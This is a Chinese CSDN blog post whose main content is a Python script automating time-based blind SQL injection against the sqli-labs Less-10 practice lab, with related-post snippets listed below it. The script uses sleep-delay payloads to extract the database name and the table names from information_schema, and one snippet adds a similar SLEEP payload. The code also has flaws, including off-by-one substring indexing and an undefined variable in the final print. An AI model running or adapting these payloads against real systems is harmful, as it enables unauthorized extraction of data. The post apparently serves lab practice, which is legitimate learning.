时间盲注脚本

最新推荐文章于 2024-05-21 06:57:45 发布
最新推荐文章于 2024-05-21 06:57:45 发布
阅读量296 收藏 2
点赞数
文章标签: python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_55347427/article/details/126116655
版权 
import requests,time,string
# 假设页面无任何回显需要用到时间注入
url='http://192.168.28.133/sqli-labs-master/Less-10/?id=1" and '
a1=0
for a in range(10):
    start=time.time()
    res=requests.get(f"{url}if(length(database())={a},sleep(2),1)-- -")
    response = res.text
    end=time.time()
    if end-start>1:
        a1=a
        print(f'库名长度为{a1}')
        break
low = 'abcdefghijklmnopqrstuvw,xyz'
res1=''
for a2 in range(a1+1):
    for a3 in low:
        start = time.time()
        res3 = requests.get(f"{url}if(substr(database(),{a2},1)='{a3}',sleep(2),1)-- - ")
        response4=res3.text
        end = time.time()
        if end-start>1:
           res1+=a3
print(f'库名为{res1}')

# 查表数量,不需要判断表的数量,直接gruop_concat
res8=[]
# 取表名
res7 = ''
for a7 in range(1,60):
    for a8 in low:
        start = time.time()
        res6 = requests.get(f"{url}if(substr((SELECT group_concat(table_name) from information_schema.tables where table_schema='{res1}'),{a7},1)='{a8}',sleep(3),1) ")
        response6=res6.text
        end = time.time()
        if end - start > 2:
            res7+=a8
res8.append(res7)
print(res8)

print(f'数据库{res4}有{res8}表')
wuqinghalasao
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
时间盲注python脚本.zip
12-28
python编写时间盲注自动化的脚本
sqli-labs 第九关 基于时间盲注 python 脚本
Mirror_iu的博客
01-25 3009
# @Author:Mirror import time import requests db_len = 0 def get_schema_len (url): len = 0 left = 0 right = 20 while (left <= right): mid = left + (right - left)//2; data = "id=1' and if(length(database())>{},sleep(0.
python实现自动化延迟注入-时间盲注脚本-源代码
qq_54037445的博客
11-30 1559
在做手工的sql时间注入时,他需要一个字符一个字符的去猜,如果手动的去一个尝试,会浪费大量的时间,所以当时也就是了解他的原理后就没有试过了,这次尝试用python实现时间盲注
时间盲注脚本(附带注释)
sGanYu
03-22 2753
参考python安全攻防时间盲注,自己修改了一些内容,加入了异常处理防止乱跑 # -*- coding: UTF-8 -*- import requests import time DBName = "" # 数据库名的变量 DBTables = [] DBColumns = [] DBData = {} requests.adapters.DEFAULT_RETRIES = 10 conn = requests.session() conn.keep_alive = False # 设置重连
python脚本实现sql时间盲注
wrypot的博客
03-27 681
python脚本实现sql盲注 sqli-labs-master pass-10 有好用脚本的大佬可以分享一波,抄袭转载请附上本文地址,违法必究。做时间盲注的只需要改一下url和payload,payload里面的闭合字符要改成正确的。将列的ascii码转化为字符,跟上面将表名的ascii码转化为字符一样。这里用sqli-labs-master第10关举例。将字段ascii码转化为字符。将表的ascii转化为字符。3、爆表名的ascii码。4、爆列的ascii码。5、爆字段ascii码。
时间盲注脚本——以sqli-labs第十关为例
weixin_52450702的博客
12-14 479
时间盲注脚本
布尔盲注python脚本.zip
12-28
GET和POSTpython脚本
ctfshow web214 时间盲注标准脚本
10-21
ctfshow web214 时间盲注标准脚本
ctfshow web139命令盲注脚本
10-21
ctfshow靶场 web入门 web139 命令盲注脚本
CTFSHOW web192 标注盲注脚本
05-04
脚本尝试通过 SQL 注入获取一个网站的 flag,实现过程是构造不同的 SQL 注入 payload 并发送 POST 请求,如果返回的响应中包含特定字符串,则说明获取到了一个字符,将其添加到 flag 中,最终输出完整的 flag。...
CTFHUB SQL注入——时间盲注 附自己写的脚本
wuuconix's blog
08-28 2170
介绍 时间盲注和上一篇布尔盲注一样都是盲注,都需要借助length,ascii,substr这些神奇的函数来猜测各项信息。它们的差别是猜测成功的依据。 布尔盲注的话如果查询有结果,一般会有一个success_flag,比如在上一题里就会返回query successfully。我的脚本也就是request返回值里有没有这个文本来判断是否查询成功的。 但是时间盲注不一样,它不光不给你查询的内容的回显,不给你报错信息,甚至连布尔盲注里的success_flag也不给你。也就是什么情况呢?你在那里查询,它什么信息
Python脚本-时间盲注
m0_74317362的博客
09-23 1020
添加了time.sleep(0.05)
Python 安全开发 时间盲注脚本
YouthBelief的博客
10-26 1291
时间盲注0x00 时间盲注原理用到的函数有流程0x01脚本编写 (请求少,费时多)1.1用到的库1.2判断页面响应1.3判断返回字符串长度1.4 获取查询结果1.5 主函数0x02 脚本编写(请求多,费时少) 0x00 时间盲注原理 时间盲注应用于 页面 无论输入什么 页面显示 内容都一样, 可以用 ’ and sleep(5) --+ 发现 页面响应超过5秒 用到的函数有 sleep(5) 延时函数 延迟5秒 if($SQL,sleep(5),1) if函数 如果sql语句为真,执行sleep
超硬核,SQL注入之时间盲注,原理+步骤+实战思路
热门推荐
wangyuxiang946的博客
04-15 1万+
延时注入,什么是时间盲注时间盲注原理?时间盲注使用步骤?时间盲注使用场景?时间盲注Python脚本
基于时间盲注
2301_77789826的博客
05-08 111
时间盲注,通过时间函数使SQL语句执行时间延长,从页面响应时间判断条件是否正确的一种注入方式。用到的函数为sleep()。
渗透测试基础-盲注(布尔盲注时间盲注
weixin_45488495的博客
04-09 3504
渗透测试基础-盲注布尔盲注时间盲注盲注实现的关键函数布尔盲注靶场演练时间盲注靶场演练漏洞总结 只为对所学知识做一个简单的梳理,如果有表达存在问题的地方,麻烦帮忙指认出来。我们一起为了遇见更好的自己而努力????! 盲注的特点如它的名字那样,它关闭了因恶意语句而导致的报错,也没有了像显错注入那样醒目的提醒。它的提示会很隐晦,就看我们有没有能力能让它显现出来。 布尔盲注时间盲注 盲注也分布尔盲注时间盲注,这里分别来了解一下各自的区别 布尔盲注:相较于显错注入,反应会更隐晦,比如当执行的恶意语句条件为Fal
渗透测试——sql注入进阶/基于时间盲注/一看就会/
ChenD的学习笔记
10-06 1703
基于时间盲注
Web安全:SQL注入之时间盲注原理+步骤+实战操作
最新发布
wangyuxiang946的博客
05-21 1674
这篇文章为大家解析时间盲注的实现原理,结合实战案例讲解时间盲注的操作步骤以及时间误差的判断
基于时间盲注python脚本
weixin_43460822的博客
10-07 2274
思路:重要的是构建payload,然后循环进行测试,通过对请求的时间进行判断payload是否正确,从而确定数据库的长度和数据库的名称. #encoding=utf-8 #时间盲注脚本 import requests import time import datetime #获取数据库长度 def database_len(): #存放跑出的结果 length=0 ...
sqlmap的盲注脚本
01-14
下面是一个针对盲注脚本示例: ```python import requests # 设置目标URL target_url = "http://example.com/login.php" # 设置payload payload = "' OR '1'='1' AND SLEEP(5) --" # 构造请求 headers = {'...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值